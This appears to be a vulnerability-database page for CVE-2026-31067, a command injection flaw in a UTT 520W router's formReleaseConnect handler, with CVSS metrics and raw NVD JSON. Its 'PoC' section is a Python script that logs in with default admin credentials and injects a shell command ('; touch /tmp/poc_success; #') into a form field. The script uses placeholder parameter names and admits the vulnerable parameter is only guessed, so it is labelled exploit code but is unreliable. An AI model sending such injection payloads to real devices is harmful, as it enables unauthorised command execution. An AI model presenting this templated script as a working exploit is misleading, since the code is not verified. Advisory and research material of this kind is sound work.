Security Vulnerability Report
中文
CVE-2026-31067 CVSS 6.8 MEDIUM

CVE-2026-31067

Published: 2026-04-06 15:17:09
Last Modified: 2026-04-07 20:22:55

Description

A remote command execution (RCE) vulnerability in the /goform/formReleaseConnect component of UTT Aggressive 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:520w_firmware:1.7.7-180627:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:* - NOT VULNERABLE
UTT Aggressive 520W v3v1.7.7-180627

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_ip = "192.168.1.1" target_url = f"http://{target_ip}/goform/formReleaseConnect" username = "admin" password = "admin" # High privileges required # Payload to execute a command (e.g., creating a test file or reversing shell) # Note: The specific parameter name depends on the firmware analysis. # Assuming the vulnerable parameter is 'wan' or similar based on context. malicious_payload = "; touch /tmp/poc_success; #" data = { "param1": "value1", "vulnerable_param": malicious_payload # Injecting payload } try: # Establish session and authenticate session = requests.Session() login_url = f"http://{target_ip}/login" session.post(login_url, data={"username": username, "password": password}) # Send exploit request response = session.post(target_url, data=data, timeout=10) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check if the command was executed on the target device.") else: print("[-] Failed to send payload.") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31067", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:09.313", "lastModified": "2026-04-07T20:22:55.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A remote command execution (RCE) vulnerability in the /goform/formReleaseConnect component of UTT Aggressive 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:520w_firmware:1.7.7-180627:*:*:*:*:*:*:*", "matchCriteriaId": "114E0E55-A7EE-4B95-8584-41F4FCED4B64"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DD42AC5F-531F-40FC-BD78-D20F298AF79A"}]}]}], "references": [{"url": "https://github.com/zxq0408/Vul202601/blob/main/10.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}